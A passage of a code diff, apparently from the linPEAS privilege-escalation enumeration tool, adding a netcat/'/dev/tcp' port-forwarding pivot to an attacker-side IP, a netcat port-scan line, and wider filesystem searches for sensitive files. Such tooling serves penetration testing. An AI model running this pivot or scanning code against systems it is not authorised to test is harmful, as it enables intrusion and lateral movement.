($NC_SCAN "$IP3"."$j" "$port" 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") &
|
||||||
fi
|
fi
|
||||||
@ -946,6 +958,24 @@ discovery_port_scan (){
|
|||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
port_forward (){
|
||||||
|
LOCAL_IP=$1
|
||||||
|
LOCAL_PORT=$2
|
||||||
|
REMOTE_IP=$3
|
||||||
|
REMOTE_PORT=$4
|
||||||
|
|
||||||
|
echo "In your local machine execute:"
|
||||||
|
echo "cd /tmp; rm backpipe; mknod backpipe p;"
|
||||||
|
echo "nc -lvnp $LOCAL_PORT 0<backpipe | nc -lvnp 9009 1>backpipe"
|
||||||
|
echo ""
|
||||||
|
echo "Press any key when you have executed the commands"
|
||||||
|
read -n 1
|
||||||
|
|
||||||
|
bash -c "exec 3<>/dev/tcp/$REMOTE_IP/$REMOTE_PORT; exec 4<>/dev/tcp/$LOCAL_IP/9009; cat <&3 >&4 & cat <&4 >&3 &"
|
||||||
|
echo "If not error was indicated, your local port $LOCAL_PORT should be forwarded to $REMOTE_IP:$REMOTE_PORT"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
###########################################
|
###########################################
|
||||||
#---) Exporting history env variables (---#
|
#---) Exporting history env variables (---#
|
||||||
###########################################
|
###########################################
|
||||||
@ -1031,12 +1061,46 @@ elif [ "$IP" ]; then
|
|||||||
exit 0
|
exit 0
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
if [ "$PORT_FORWARD" ]; then
|
||||||
|
if ! [ "$FOUND_BASH" ]; then
|
||||||
|
printf $RED"[-] Err: Port forwarding not possible, no bash in PATH\n"$NC;
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
LOCAL_IP="$(echo -n $PORT_FORWARD | cut -d ':' -f 1)"
|
||||||
|
LOCAL_PORT="$(echo -n $PORT_FORWARD | cut -d ':' -f 2)"
|
||||||
|
REMOTE_IP="$(echo -n $PORT_FORWARD | cut -d ':' -f 3)"
|
||||||
|
REMOTE_PORT="$(echo -n $PORT_FORWARD | cut -d ':' -f 4)"
|
||||||
|
|
||||||
|
if ! [ "$LOCAL_IP" ] || ! [ "$LOCAL_PORT" ] || ! [ "$REMOTE_IP" ] || ! [ "$REMOTE_PORT" ]; then
|
||||||
|
printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
#Check if LOCAL_PORT is a number
|
||||||
|
if ! [ "$(echo $LOCAL_PORT | grep -E '^[0-9]+$')" ]; then
|
||||||
|
printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
|
||||||
|
fi
|
||||||
|
|
||||||
|
#Check if REMOTE_PORT is a number
|
||||||
|
if ! [ "$(echo $REMOTE_PORT | grep -E '^[0-9]+$')" ]; then
|
||||||
|
printf $RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example: 10.10.14.8:7777:127.0.0.1:8000"$NC;
|
||||||
|
fi
|
||||||
|
|
||||||
|
port_forward "$LOCAL_IP" "$LOCAL_PORT" "$REMOTE_IP" "$REMOTE_PORT"
|
||||||
|
exit 0
|
||||||
|
fi
|
||||||
|
|
||||||
|
|
||||||
#Get HOMESEARCH
|
#Get HOMESEARCH
|
||||||
HOMESEARCH="/home/ /Users/ /root/ $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users" | tr "\n" " ")"
|
if [ "$SEARCH_IN_FOLDER" ]; then
|
||||||
if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users"; then #If not listed and not in /home, /Users/ or /root, add current home folder
|
HOMESEARCH="${ROOT_FOLDER}home/ ${ROOT_FOLDER}Users/ ${ROOT_FOLDER}root/ ${ROOT_FOLDER}var/www/"
|
||||||
|
else
|
||||||
|
HOMESEARCH="/home/ /Users/ /root/ /var/www $(cat /etc/passwd 2>/dev/null | grep "sh$" | cut -d ":" -f 6 | grep -Ev "^/root|^/home|^/Users|^/var/www" | tr "\n" " ")"
|
||||||
|
if ! echo "$HOMESEARCH" | grep -q "$HOME" && ! echo "$HOMESEARCH" | grep -qE "^/root|^/home|^/Users|^/var/www"; then #If not listed and not in /home, /Users/, /root, or /var/www add current home folder
|
||||||
HOMESEARCH="$HOME $HOMESEARCH"
|
HOMESEARCH="$HOME $HOMESEARCH"
|
||||||
fi
|
fi
|
||||||
|
fi
|
||||||
GREPHOMESEARCH=$(echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before putting "|"
|
GREPHOMESEARCH=$(echo "$HOMESEARCH" | sed 's/ *$//g' | tr " " "|") #Remove ending spaces before putting "|"
|
||||||
|
|
||||||
|
|
||||||
|
@ -173,11 +173,11 @@ class LinpeasBuilder:
|
|||||||
|
|
||||||
if type == "d":
|
if type == "d":
|
||||||
find_line += "-type d "
|
find_line += "-type d "
|
||||||
bash_find_var = f"FIND_DIR_{r[1:].replace('.','').replace('-','_').upper()}"
|
bash_find_var = f"FIND_DIR_{r[1:].replace('.','').replace('-','_').replace('{ROOT_FOLDER}','').upper()}"
|
||||||
self.bash_find_d_vars.add(bash_find_var)
|
self.bash_find_d_vars.add(bash_find_var)
|
||||||
all_folder_regexes += regexes
|
all_folder_regexes += regexes
|
||||||
else:
|
else:
|
||||||
bash_find_var = f"FIND_{r[1:].replace('.','').replace('-','_').upper()}"
|
bash_find_var = f"FIND_{r[1:].replace('.','').replace('-','_').replace('{ROOT_FOLDER}','').upper()}"
|
||||||
self.bash_find_f_vars.add(bash_find_var)
|
self.bash_find_f_vars.add(bash_find_var)
|
||||||
all_file_regexes += regexes
|
all_file_regexes += regexes
|
||||||
|
|
||||||
@ -275,7 +275,7 @@ class LinpeasBuilder:
|
|||||||
analise_line = ""
|
analise_line = ""
|
||||||
if init:
|
if init:
|
||||||
analise_line = 'if ! [ "`echo \\\"$PSTORAGE_'+precord.bash_name+'\\\" | grep -E \\\"'+real_regex+'\\\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "'+frecord.regex+'"; fi; fi; '
|
analise_line = 'if ! [ "`echo \\\"$PSTORAGE_'+precord.bash_name+'\\\" | grep -E \\\"'+real_regex+'\\\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "'+frecord.regex+'"; fi; fi; '
|
||||||
analise_line += 'printf "%s" "$PSTORAGE_'+precord.bash_name+'" | grep -E "'+real_regex+'" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,'+real_regex+',${SED_RED},"; '
|
analise_line += 'printf "%s" "$PSTORAGE_'+precord.bash_name+'" | grep -E "'+real_regex+'" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,'+real_regex+',${SED_RED},"; '
|
||||||
|
|
||||||
#If just list, just list the file/directory
|
#If just list, just list the file/directory
|
||||||
if frecord.just_list_file:
|
if frecord.just_list_file:
|
||||||
@ -393,13 +393,13 @@ class LinpeasBuilder:
|
|||||||
|
|
||||||
# If custom folder to search in
|
# If custom folder to search in
|
||||||
regexes_search_section += 'if [ "$SEARCH_IN_FOLDER" ]; then\n'
|
regexes_search_section += 'if [ "$SEARCH_IN_FOLDER" ]; then\n'
|
||||||
regexes_search_section += " timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n"
|
regexes_search_section += " timeout 120 find \"$ROOT_FOLDER\" -type f -not -path \"*/node_modules/*\" -exec grep -HnRiIE \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n"
|
||||||
|
|
||||||
# If search in all the file system
|
# If search in all the file system
|
||||||
regexes_search_section += 'else\n'
|
regexes_search_section += 'else\n'
|
||||||
for path in paths_to_search:
|
for path in paths_to_search:
|
||||||
grep_flags = "-HnRiIE" if caseinsensitive else "-HnRIE"
|
grep_flags = "-HnRiIE" if caseinsensitive else "-HnRIE"
|
||||||
regexes_search_section += " timeout 120 find "+path+" -type f -exec grep "+grep_flags+" \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n"
|
regexes_search_section += " timeout 120 find "+path+" -type f -not -path \"*/node_modules/*\" -exec grep "+grep_flags+" \""+regex+"\" '{}' \; 2>/dev/null "+extra_grep+" | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &\n"
|
||||||
regexes_search_section += 'fi\n'
|
regexes_search_section += 'fi\n'
|
||||||
|
|
||||||
regexes_search_section += "wait\n"
|
regexes_search_section += "wait\n"
|
||||||
|
Loading…
Reference in New Issue
Block a user